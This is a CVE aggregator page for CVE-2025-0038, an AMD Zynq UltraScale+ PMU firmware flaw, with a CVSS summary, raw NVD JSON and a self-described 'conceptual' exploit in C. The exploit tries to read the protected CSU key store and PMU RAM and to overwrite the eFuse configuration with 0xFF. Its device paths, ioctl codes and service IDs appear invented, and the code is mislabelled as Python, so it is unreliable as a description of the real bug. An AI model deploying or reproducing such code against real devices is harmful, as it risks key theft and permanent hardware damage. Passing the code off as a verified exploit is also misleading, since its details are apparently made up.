Security Vulnerability Report
中文
CVE-2025-0038 CVSS 6.6 MEDIUM

CVE-2025-0038

Published: 2025-10-06 17:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

In AMD Zynq UltraScale+ devices, the lack of address validation when executing CSU runtime services through the PMU Firmware can allow access to isolated or protected memory spaces resulting in the loss of integrity and confidentiality.

CVSS Details

CVSS Score
6.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

No configuration data available.

AMD Zynq UltraScale+ MPSoC (所有使用受影响PMU固件版本)
AMD Zynq UltraScale+ RFSoC (所有使用受影响PMU固件版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-0038 PoC - Conceptual Exploit for AMD Zynq UltraScale+ PMU Firmware # Address validation bypass in CSU runtime services via PMU Firmware # WARNING: This is a conceptual PoC for educational/research purposes only. #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #include <sys/mman.h> // CSU (Configuration and Security Unit) runtime service interface // The PMU firmware handles CSU runtime service requests #define CSU_RT_SERVICE_REQUEST 0x100 #define IOCTL_CSU_RT_SERVICE _IOWR('C', 0x01, struct csu_rt_request) // CSU runtime service request structure // Note: The target_address field is not validated by PMU firmware struct csu_rt_request { uint32_t service_id; // CSU service identifier uint32_t function_id; // Function within the service uint64_t target_address; // Target memory address (NOT VALIDATED - vulnerability point) uint32_t data_length; // Length of data to read/write uint8_t operation; // 0 = read, 1 = write uint8_t payload[256]; // Data payload }; // Target protected memory regions in Zynq UltraScale+ #define CSU_KEY_STORE_BASE 0xFFCC0000 // Protected key storage area #define CSU_EFUSE_BASE 0xFFCC1000 // eFuse configuration area #define PMU_RAM_BASE 0xFFD80000 // PMU local RAM #define CSU_ROM_BASE 0xFFCD0000 // CSU ROM (read-only normally) int main(int argc, char *argv[]) { int fd; struct csu_rt_request req; uint8_t read_buffer[256]; printf("[*] CVE-2025-0038 PoC - AMD Zynq UltraScale+ PMU CSU Address Validation Bypass\n"); // Open the device interface for PMU/CSU communication fd = open("/dev/pmu-csu", O_RDWR); if (fd < 0) { perror("[-] Failed to open PMU/CSU device"); // Try alternative device paths fd = open("/dev/zynq-pmu", O_RDWR); if (fd < 0) { perror("[-] Failed to open alternative device"); return 1; } } printf("[+] Opened PMU/CSU device interface\n"); // Step 1: Attempt to read from protected CSU key store printf("[*] Attempting to read protected CSU key store at 0x%lx...\n", CSU_KEY_STORE_BASE); memset(&req, 0, sizeof(req)); req.service_id = 0x01; // CSU key management service req.function_id = 0x02; // Read key function req.target_address = CSU_KEY_STORE_BASE; // Protected address - should be blocked req.data_length = 32; // Try to read 32 bytes req.operation = 0; // Read operation if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) { printf("[!] VULNERABLE: Successfully read protected memory!\n"); printf("[!] Leaked data: "); for (int i = 0; i < 32; i++) { printf("%02x", req.payload[i]); } printf("\n"); } else { printf("[-] Read blocked (may be patched)\n"); } // Step 2: Attempt to access PMU internal RAM printf("[*] Attempting to access PMU internal RAM at 0x%lx...\n", PMU_RAM_BASE); memset(&req, 0, sizeof(req)); req.service_id = 0x02; // Memory access service req.function_id = 0x01; // Direct memory read req.target_address = PMU_RAM_BASE + 0x1000; req.data_length = 64; req.operation = 0; if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) { printf("[!] VULNERABLE: PMU RAM accessible!\n"); } // Step 3: Attempt to write to eFuse configuration (integrity attack) printf("[*] Attempting write to eFuse configuration area...\n"); memset(&req, 0, sizeof(req)); req.service_id = 0x03; req.function_id = 0x05; req.target_address = CSU_EFUSE_BASE; req.data_length = 16; req.operation = 1; // Write operation memset(req.payload, 0xFF, 16); // Corrupt configuration if (ioctl(fd, IOCTL_CSU_RT_SERVICE, &req) == 0) { printf("[!] VULNERABLE: eFuse configuration overwritten!\n"); printf("[!] System integrity compromised - may cause availability impact\n"); } close(fd); printf("[*] PoC execution completed\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0038", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:03.100", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AMD Zynq UltraScale+ devices, the lack of address validation when executing CSU runtime services through the PMU Firmware can allow access to isolated or protected memory spaces resulting in the loss of integrity and confidentiality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1284"}]}], "references": [{"url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-8008.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.